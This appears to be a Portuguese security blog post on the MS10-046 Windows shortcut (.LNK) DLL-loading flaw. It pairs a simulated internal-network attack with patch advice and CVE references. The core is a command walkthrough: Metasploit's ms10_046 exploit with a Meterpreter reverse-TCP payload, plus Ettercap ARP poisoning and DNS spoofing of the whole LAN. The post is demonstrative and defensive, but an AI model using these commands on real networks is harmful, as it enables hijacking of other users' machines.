Recentemente foi detectada uma vulnerabilidade que afetas os principais sistemas operacionais da família Microsoft: Windows Server 2003, Windows Server 2008, Windows Vista, XP e 7.

A vulnerabilidade ocorre em atalhos com extensão .LNK ou .PIF e permite que seja invocada alguma DLL maliciosa. Esta é uma vulnerabilidade de alta criticidade e caso algum atacante consiga explorá-la, obteria os mesmos privilégios do usuário local autenticado na máquina, assim seria possível a execução de códigos remotamente.

A seguir estarei dando um exemplo de como está vulnerabilidade poderia vir ser explorada.

Na demonstração abaixo foi utilizado os programas Metasploit e Ettercap.

——————————————————————————————————————————–

Abra o console do Metasploit e siga os comandos abaixo:

use exploit/windows/browser/ms10_046_shortcut_icon_dllloader

set LHOST 192.168.106.134

set PAYLOAD windows/meterpreter/reverse_tcp

Em outro Terminal:

#kate /usr/share/ettercap/etter.dns

Coloque o parâmetro abaixo na última linha.

*.*.* A X.X.X.X

Onde, X.X.X.X é o seu endereço IP

Salve o arquivo etter.dns.

#ettercap -T -q -P dns_spoof -M ARP // //

No Terminal do metasploit:

exploit

——————————————————————————————————————————–

Quando algum computador da rede interna solicitar uma página Web para o servidor DNS o mesmo será exploitado, pois o verdadeiro servidor DNS foi spoofado.

O que foi feito?

O ataque demonstrado acima é uma simulação de ataque efetuada em uma rede interna. O Metasploit foi configurado de modo a ficar aguardando conexões para o módulo do exploit.

Utilizando o Ettercap foi realizado um DNS Spoof e um ARP Poisoning em toda a rede interna, personificando o servidor DNS e alterando toda a tabela de endereços MAC do roteador ou switch utilizado pela rede. Este ataque tem o objetivo de fazer com que toda solicitação de resolução de nomes de domínio enviada ao servidor DNS, sejam agora enviadas para o computador do atacante. No momento em que os demais usuários da rede abrem seus navegadores com o intuito do visualizar alguma página Web, eles são conectados ao módulo do exploit que está aguardando conexões.

Recomendação:

Para corrigir o problema acima deve ser instalado o patch de correção, segundo a referência abaixo

http://www.microsoft.com/technet/security/bulletin/ms10-046.mspx

Referência da Vulnerabilidade:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2010-2568

http://www.osvdb.org/66387

Conclusão

Como podemos observar, sempre surgem vulnerabilidades 0-Day inesperadas em sistemas e não podemos simplesmente confiar na atualização do Windows Update.

Até a próxima 🙂